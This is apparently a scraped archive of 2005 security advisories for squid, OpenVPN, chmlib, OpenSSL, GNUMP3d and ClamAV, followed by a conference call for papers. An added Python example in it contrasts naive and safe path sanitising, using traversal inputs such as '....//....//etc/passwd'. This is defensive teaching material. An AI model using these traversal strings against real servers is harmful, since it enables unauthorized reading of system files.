    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_alpha.deb
      Size/MD5 checksum:    76148 f9310bc22c747405959b1a548765f48e
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody11_alpha.deb
      Size/MD5 checksum:    60940 a3032f47551bfc3a53623631f2fda3f1

  ARM architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_arm.deb
      Size/MD5 checksum:   727402 3cb96a5aa6b00203ea2f8ca447ff21ae
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_arm.deb
      Size/MD5 checksum:    73928 2dc73eb6c00e423056ea6fccf7ef0855
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody11_arm.deb
      Size/MD5 checksum:    59250 6d4a9adeffca56d10026dd775ea1766c

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_i386.deb
      Size/MD5 checksum:   685502 0ac74ef690c17e054f7c1d9a0319d7de
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_i386.deb
      Size/MD5 checksum:    74448 873b78ff72c7bf4dd6497228a50fe3f5
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody11_i386.deb
      Size/MD5 checksum:    58946 fcd7e84899b7e0cc7b5290899f9b95ec

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_ia64.deb
      Size/MD5 checksum:   955144 956ca54bbec7ee77f4e53f62f5078bd0
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_ia64.deb
      Size/MD5 checksum:    79996 6bba69eaedc04ccacc73191750eb65bc
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody11_ia64.deb
      Size/MD5 checksum:    63612 12d098851265c912a45c20fb66528bf6

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_hppa.deb
      Size/MD5 checksum:   780488 8eae73112548261c5d9cb52c39468c73
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_hppa.deb
      Size/MD5 checksum:    75376 6a9c3c90ab04d5594387c07f1086f3f6
    http://security.debian.org/pool/updates/main/s/squid/squidclient_2.4.6-2woody11_hppa.deb
      Size/MD5 checksum:    60400 7b0c999f8016a93fa2c804003e8997ba

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/s/squid/squid_2.4.6-2woody11_m68k.deb
      Size/MD5 checksum:   667508 37917b970bd277c5e33d44aa7193d4e1
    http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.4.6-2woody11_m68k.deb
      Size/MD5 checksum:    73258 9de2cd08019e7fdd6ab5ed9e4fd191b0
    http://security.
[SECURITY] [DSA 885-1] New OpenVPN packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 885-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
November 7th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : openvpn
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2005-3393 CVE-2005-3409
CERT advisory  :
BugTraq ID     : 15239
Debian Bug     : 336751 337334

Several vulnerabilities have been discovered in OpenVPN, a free virtual
private network daemon. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2005-3393

    A format string vulnerability has been discovered that could allow
    arbitrary code to be executed on the client.

CVE-2005-3409

    A NULL pointer dereferencing has been discovered that could be
    exploited to crash the service.

The old stable distribution (woody) does not contain openvpn packages.

For the stable distribution (sarge) these problems have been fixed in
version 2.0-1sarge2.

For the unstable distribution (sid) these problems have been fixed in
version 2.0.5-1.

We recommend that you upgrade your openvpn package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2.dsc
      Size/MD5 checksum:      629 1cea04a008a9b888b404c7ec2e5c2ef2
    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2.diff.gz
      Size/MD5 checksum:    52800 a48a32ae512664fa21ac2f18b13aca8b
    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0.orig.tar.gz
      Size/MD5 checksum:   639201 7401faebc6baee9add32608709c54eec

  Alpha architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_alpha.deb
      Size/MD5 checksum:   347438 9dcec8dd6cdf3efcaea58097a526d95d

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_amd64.deb
      Size/MD5 checksum:   316598 34e437c2b5c671a0945e23dc314c7d61

  ARM architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_arm.deb
      Size/MD5 checksum:   296726 7eb2f74d7f6334aa864638b18261e6ed

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_i386.deb
      Size/MD5 checksum:   302630 b48bfb10468d6177ca5825382a5b9f3a

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_ia64.deb
      Size/MD5 checksum:   395760 ca6d5c797d96fccf4ff785406bc9cd8c

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_hppa.deb
      Size/MD5 checksum:   316894 d8a83c52f67b478a7ac2481411b4850c

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_m68k.deb
      Size/MD5 checksum:   276658 fb776634c4805ce5b3c98b34c244b8b8

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_mips.deb
      Size/MD5 checksum:   317832 400f6f80ece6d8937aca0500a47aaba8

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_mipsel.deb
      Size/MD5 checksum:   319656 ea3d192a110f8231ac4146490cd4ab46

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_powerpc.deb
      Size/MD5 checksum:   309090 8baabfbe69032a23414ca0e97caec7b9

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_s390.deb
      Size/MD5 checksum:   307492 c63d7c1f5ac2f469ecfdee8673da39d4

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/o/openvpn/openvpn_2.0-1sarge2_sparc.deb
      Size/MD5 checksum:   295050 913b178ac53ea6676600200c95be4f46

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package
[SECURITY] [DSA 886-1] New chmlib packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 886-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
November 7th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : chmlib
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE IDs        : CVE-2005-2659 CVE-2005-2930 CVE-2005-3318
BugTraq ID     : 15211

Several vulnerabilities have been discovered in chmlib, a library for
dealing with CHM format files. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2005-2659

    Palasik Sandor discovered a buffer overflow in the LZX decompression
    method.

CVE-2005-2930

    A buffer overflow has been discovered that could lead to the
    execution of arbitrary code.

CVE-2005-3318

    Sven Tantau discovered a buffer overflow that could lead to the
    execution of arbitrary code.

The old stable distribution (woody) does not contain chmlib packages.

For the stable distribution (sarge) these problems have been fixed in
version 0.35-6sarge1.

For the unstable distribution (sid) these problems have been fixed in
version 0.37-2.

We recommend that you upgrade your chmlib packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1.dsc
      Size/MD5 checksum:      604 022d55ea43ef4a54648b0823163c4a07
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1.diff.gz
      Size/MD5 checksum:    15698 55eeab9a32a66c5e123ab51f3d7427df
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35.orig.tar.gz
      Size/MD5 checksum:   368428 8fa0e692b2606a03fb51589f66a82eec

  Alpha architecture:

    http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_alpha.deb
      Size/MD5 checksum:    25688 2471920dc5214b95a44e50e2a8800ada
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_alpha.deb
      Size/MD5 checksum:    18576 0b1d802a79cea68c00d36cd9cb7a36cd
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_alpha.deb
      Size/MD5 checksum:    25544 23306cc3f7b0772f744707c86fa9258a

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_amd64.deb
      Size/MD5 checksum:    23748 e5a72c3311e7b00d6295a75f7bb37560
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_amd64.deb
      Size/MD5 checksum:    16928 8a2d68579e364a284c03dcc4b9a01e37
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_amd64.deb
      Size/MD5 checksum:    22564 50d2a8d694d1bf7251d18b4f7b02ede7

  ARM architecture:

    http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_arm.deb
      Size/MD5 checksum:    25242 ec14b38be010c3f1fee93dd618124c5e
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_arm.deb
      Size/MD5 checksum:    15962 5e1ec37635078cc29b9f2a4f91f9b20e
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_arm.deb
      Size/MD5 checksum:    24000 bc84ed2d77918f6eb4378f35f43cd4e5

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_i386.deb
      Size/MD5 checksum:    24872 fbea0ba2924295a9f553c346eeb164af
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_i386.deb
      Size/MD5 checksum:    16094 de94d72e5414d1b218fd32f11cd7351b
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_i386.deb
      Size/MD5 checksum:    22872 3e37bda96c284423f467aecb88e8dc98

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_ia64.deb
      Size/MD5 checksum:    28504 ef19dde34158fa817781c685d2499cbb
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_ia64.deb
      Size/MD5 checksum:    19348 e15dc8288ba0a0bee7a9490c4fe653de
    http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_ia64.deb
      Size/MD5 checksum:    27268 497388fcd7e08a7558dde96082b2707a

  HP Precision architecture:

    http://security.debian.org/pool
[SECURITY] [DSA 888-1] New OpenSSL packages fix cryptographic weakness
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 888-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
November 7th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : openssl
Vulnerability  : cryptographic weakness
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2005-2969

Yutaka Oiwa discovered a vulnerability in the Open Secure Socket Layer
(OpenSSL) library that can allow an attacker to perform active
protocol-version rollback attacks that could lead to the use of the
weaker SSL 2.0 protocol even though both ends support SSL 3.0 or TLS
1.0.

The following matrix explains which version in which distribution has
this problem corrected.

                   oldstable (woody)    stable (sarge)    unstable (sid)
    openssl        0.9.6c-2.woody.8     0.9.7e-3sarge1    0.9.8-3
    openssl094     0.9.4-6.woody.4      n/a               n/a
    openssl095     0.9.5a-6.woody.6     n/a               n/a
    openssl096     n/a                  0.9.6m-1sarge1    n/a
    openssl097     n/a                  n/a               0.9.7g-5

We recommend that you upgrade your libssl packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8.dsc
      Size/MD5 checksum:      632 0f3990f71f6773a516a413c393fc6604
    http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8.diff.gz
      Size/MD5 checksum:    45527 30aa51e1f88c95e086f7918a47fe8f5c
    http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c.orig.tar.gz
      Size/MD5 checksum:  2153980 c8261d93317635d56df55650c6aeb3dc

  Architecture independent components:

    http://security.debian.org/pool/updates/main/o/openssl/ssleay_0.9.6c-2.woody.8_all.deb
      Size/MD5 checksum:      982 71fd036f7135cd3e68c4cf33ed7e2976

  Alpha architecture:

    http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.8_alpha.deb
      Size/MD5 checksum:  1551638 2f5d722aa4b7c7bd6c9908a3998b6420
    http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.8_alpha.deb
      Size/MD5 checksum:   571552 5e94a096f7569a2e18f82a697908d230
    http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8_alpha.deb
      Size/MD5 checksum:   736780 2f964e236883e2c8ed7ad2d28ed2bc6b

  ARM architecture:

    http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.8_arm.deb
      Size/MD5 checksum:  1358314 c2f4acf9994dd42ae0373c34163b6a96
    http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.8_arm.deb
      Size/MD5 checksum:   474348 bc3950a119bd05ab4602fc1aae42f6c0
    http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8_arm.deb
      Size/MD5 checksum:   730164 c5cc5638fb9ca1583cc23602b61a6dc7

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.8_i386.deb
      Size/MD5 checksum:  1289480 0d32fea022a7896b321d673a9138c90f
    http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.8_i386.deb
      Size/MD5 checksum:   461972 970aa086b6758741b4cbbf32e94572a1
    http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8_i386.deb
      Size/MD5 checksum:   717322 88a3bcb5d1b4330fb25c95b5c7f95bd3

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.8_ia64.deb
      Size/MD5 checksum:  1615580 e66ad48cf480c87a965cad2dadde3074
    http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.8_ia64.deb
      Size/MD5 checksum:   711412 a7ff065df8383c36ee0e265d889df450
    http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.8_ia64.deb
      Size/MD5 checksum:   763808 a62f8d33db6e9bc3e770dfd3f23fe70f

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.6c-2.woody.8_hppa.deb
      Size/MD5 checksum:  1435394 5d5be2d74a8035fdee039237f93ad267
    http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.6_0.9.6c-2.woody.8_hppa.deb
      Size/MD5 check
Re: Zoomblog HTML Injection Vulnerability
> Zoomblog is prone to HTML injection attacks. It is possible for a
> malicious Zoomblog user to inject hostile HTML and script code into
> the commentary via form fields.

This bug was corrected on Nov. 4th.

Also, the "Zoomblog BBCode Tag JavaScript Injection Vulnerability" was
corrected on Nov. 5th.

Regards,
Rogelio
http://www.zoomblog.com/
[ GLSA 200511-05 ] GNUMP3d: Directory traversal and XSS vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200511-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: GNUMP3d: Directory traversal and XSS vulnerabilities
      Date: November 06, 2005
      Bugs: #109667
        ID: 200511-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

GNUMP3d is vulnerable to directory traversal and cross-site scripting attacks that may result in information disclosure or the compromise of a browser.

Background
==========

GNUMP3d is a streaming server for MP3s, OGG Vorbis files, movies and other media formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /            Unaffected
    -------------------------------------------------------------------
  1  media-sound/gnump3d            < 2.9.7                   >= 2.9.7

Description
===========

Steve Kemp reported two cross-site scripting vulnerabilities related to the handling of files (CVE-2005-3424, CVE-2005-3425). Also reported is a directory traversal vulnerability that arises from the code's own attempt to sanitize input paths (CVE-2005-3123).

Impact
======

A remote attacker could exploit this to disclose sensitive information or inject and execute malicious script code, potentially compromising the victim's browser.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GNUMP3d users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-sound/gnump3d-2.9.7"

References
==========

  [ 1 ] CVE-2005-3123
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3123
  [ 2 ] CVE-2005-3424
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3424
  [ 3 ] CVE-2005-3425
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3425

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200511-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

pgpTgdh7vgPpV.pgp (PGP signature)
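The GLSA's note that the traversal "comes from the attempt to sanitize input paths" describes a recurring failure mode: a filter that deletes `../` once can leave behind a fresh `../` assembled from the characters around the deleted one. The following is an added example, not GNUMP3d's code (which is Perl; Python is used here so the comparison runs anywhere). It places a naive strip-once filter beside the defensive pattern of canonicalising the joined path and then requiring it to stay under the document root. The `/srv/media` root and the request strings are constructed for the demonstration.

```python
"""Strip-once path sanitising versus canonicalise-then-contain.

Added example; not GNUMP3d's code. Paths are handled purely as strings with
posixpath so the demonstration runs offline; a real server must additionally
resolve symlinks with os.path.realpath() on the live filesystem.
"""
import posixpath
from typing import Optional


def naive_sanitize(path: str) -> str:
    """The anti-pattern: delete '../' in a single pass.

    '....//' loses its middle '../' and the leftovers re-form '../', so the
    filter's output contains exactly the sequence the filter meant to remove.
    """
    return path.replace("../", "")


def resolve_naively(root: str, request: str) -> str:
    """Join the 'sanitised' request onto root; no containment check afterwards."""
    return posixpath.normpath(posixpath.join(root, naive_sanitize(request)))


def resolve_safely(root: str, request: str) -> Optional[str]:
    """Canonicalise first, then refuse anything that left the root.

    The request is never edited into shape: whatever '..' segments it carries
    are resolved by normpath, and the result is accepted only if it is root
    itself or a path strictly beneath root. Returns None for a rejected path.
    """
    root = posixpath.normpath(root)
    # Leading slashes would make join() discard root entirely, so drop them.
    candidate = posixpath.normpath(posixpath.join(root, request.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    root = "/srv/media"  # constructed document root
    for req in ("music/a.mp3", "../../etc/passwd", "....//....//etc/passwd"):
        print(f"{req!r}: naive -> {resolve_naively(root, req)}, "
              f"safe -> {resolve_safely(root, req)}")
```

Two things the safe variant relies on: the request must already be percent-decoded before it reaches `resolve_safely` (decoding after normalisation reopens the hole), and on a real filesystem the containment test should be repeated on the `realpath()` result so a symlink inside the root cannot point outside it.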
[ GLSA 200511-04 ] ClamAV: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200511-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: ClamAV: Multiple vulnerabilities
      Date: November 06, 2005
      Bugs: #109213
        ID: 200511-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

ClamAV has many security flaws which make it vulnerable to remote execution of arbitrary code and a Denial of Service.

Background
==========

ClamAV is a GPL anti-virus toolkit, designed for integration with mail servers to perform attachment scanning. ClamAV also provides a command line scanner and a tool for fetching updates of the virus database.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /            Unaffected
    -------------------------------------------------------------------
  1  app-antivirus/clamav           < 0.87.1                 >= 0.87.1

Description
===========

ClamAV has multiple security flaws: a boundary check was performed incorrectly in petite.c, a buffer size calculation in unfsg_133 was incorrect in fsg.c, a possible infinite loop was fixed in tnef.c and a possible infinite loop in cabd_find was fixed in cabd.c. In addition to this, Marcin Owsiany reported that a corrupted DOC file causes a segmentation fault in ClamAV.

Impact
======

By sending a malicious attachment to a mail server that scans with ClamAV, a remote attacker could cause a Denial of Service or the execution of arbitrary code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ClamAV users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.87.1"

References
==========

  [ 1 ] CAN-2005-3239
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3239
  [ 2 ] CAN-2005-3303
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3303
  [ 3 ] ClamAV release notes
        http://sourceforge.net/project/shownotes.php?release_id=368319
  [ 4 ] Zero Day Initiative advisory
        http://www.zerodayinitiative.com/advisories/ZDI-05-002.html

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200511-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

pgpDoG7KccR8S.pgp (PGP signature)
EUSecWest/London Call for Papers and PacSec/Tokyo announcements
url: http://eusecwest.com
url: http://pacsec.jp

(PacSec/Tokyo Announcement below...)

EUSecWest/core06 CALL FOR PAPERS
London Security Summit
February 20/21 2006

LONDON, United Kingdom -- Applied technical security will be the focus of a new annual conference from the organizers of CanSecWest and PacSec, sponsored by the U.K. government CESG, where the eminent figures in the international security industry will get together with leading European researchers to share best practices and technology. The most significant new discoveries about computer network hack attacks and defenses, commercial security solutions, and pragmatic real world security experience will be presented in central London at the Victoria Park Plaza hotel on February 20 and 21.

The EUSecWest meeting provides international researchers a relaxed, comfortable environment to learn from informative tutorials on key developments in security technology, and to collaborate and socialize with their peers in one of the world's hubs of IT activity: downtown London.

In addition to the usual one hour tutorials, panel sessions and highly entertaining 5 minute "lightning" talks, this conference will also feature a new session called "Elevator Focus Groups". Featuring several short sessions, these commercial presentations will showcase new, significantly used, or dramatically innovative products in the information security realm. Each selected vendor will have a short 10 minute presentation ("elevator pitch"), after which 10 minutes of audience Q&A and interactive discussion amongst the expert security practitioners attending will follow. In this session both the audience and the vendors can get valuable feedback from world leading experts. The attendees can get user evaluations and learn from sharing experiences about real world security applications and the practical uses of the products (the "focus group"). Hence the name: Elevator Focus Groups.

The EUSecWest conference will also feature the availability of the Security Masters Dojo expert network security sensei instructors, and their advanced and intermediate hands-on training courses, featuring small class sizes and practical application exercises to maximize information transfer.

We would like to announce the opportunity to submit papers, lightning talk proposals, and elevator focus candidate products for selection by the EUSecWest technical review committee. Please make your proposal submissions before December 1st 2006. Slides for the papers must be submitted by February 1st 2006. Some invited papers have been confirmed, but a limited number of speaking slots are still available. The conference is responsible for travel and accommodations for the speakers. If you have a proposal for a tutorial session then please email a synopsis of the material and your biography, papers and speaking background to [EMAIL PROTECTED]. Only slides will be needed for the February paper deadline; full text does not have to be submitted.

The EUSecWest/core06 conference consists of tutorials on technical details about current issues, innovative techniques and best practices in the information security realm. The audiences are a multi-national mix of professionals involved on a daily basis with security work: security product vendors, programmers, security officers, and network administrators. We give preference to technical details and new education for a technical audience.

The conference itself is a single track series of presentations in a lecture theater environment. The presentations offer speakers the opportunity to showcase on-going research and collaborate with peers while educating and highlighting advancements in security products and techniques. The focus is on innovation, tutorials, and education instead of product pitches. Some commercial content is tolerated, but it needs to be backed up by a technical presenter, either giving a valuable tutorial and best practices instruction or detailing significant new technology in the products.

Paper proposals should consist of the following information:

  1) Presenter, and geographical location (country of origin/passport) and contact info (e-mail, postal address, phone, fax).
  2) Employer and/or affiliations.
  3) Brief biography, list of publications and papers.
  4) Any significant presentation and educational experience/background.
  5) Topic synopsis, proposed paper title, and a one paragraph description.
  6) Reason why this material is innovative or significant or an important tutorial.
  7) Optionally, any samples of prepared material or outlines ready.

Please include the plain text version of this information in your email as well as any file, pdf, or html attachments.

Please forward the above information to [EMAIL PROTECTED] to be considered for placement on the speaker roster, have your lightning talk scheduled, or submit your product for inclusion in th